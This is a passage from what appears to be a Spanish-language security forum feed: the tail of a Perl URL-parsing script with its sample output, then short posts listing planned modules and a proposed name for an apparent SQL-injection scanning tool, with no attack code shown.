		([a-z0-9\-\_\s\.\;]+(?:\.\w{1,4})*)
	)*
	(.*) #fuck it!
)/gix;
 
	if($bool_req==1){
 
		foreach($parsed{requests}=~/(?:([a-z0-9\.\-_\s]+(?:[\=][^\&]+))+)+/gxi){
			push(@vars, $1) && push(@content, $2) if($_=~/^(.*)\=(.*)$/);
		}
	}
 
	for($i=0;$i<@vars;$i++){
		print "\tvariable: ",$vars[$i]," ('",$content[$i],"')\n";
	}
 
	return %parsed;
}

Este es el resultado:
c1c4tr1z(bash) % ~ $ perl parse_url.pl 
	variable: id ('999')
	variable: user ('root')
	variable: ls ('asdaeeeds')
MIME: http
Host: sorgle.com.ar
Dirs: /some_dir/another/
File: index.php
Request: ?id=999&user=root&ls=asdaeeeds
c1c4tr1z(bash) % ~ $

Espero sugerencias :D]]> C1c4Tr1Z ISIRFri, 25 Sep 2009 11:15:13 -0400 https://foro.undersecurity.net/read.php?66,4384,4384#msg-4384 Ideas / Sugerencias (no replies)https://foro.undersecurity.net/read.php?66,4384,4384#msg-4384Modulos que Faltan

  • Google Dork
  • Postgrest Module
  • Oracle Module
  • Asp Check Vulnz
  • Cfm Check Vulnz
  • Reverse Dns Module
]]> OzX ISIRThu, 24 Sep 2009 13:49:31 -0400 https://foro.undersecurity.net/read.php?66,4381,4381#msg-4381 ¿Nombres para La Tool? (12 replies)https://foro.undersecurity.net/read.php?66,4381,4381#msg-4381
Injection SQL Input Ripper.]]> OzX ISIRThu, 25 Mar 2010 21:22:18 -0400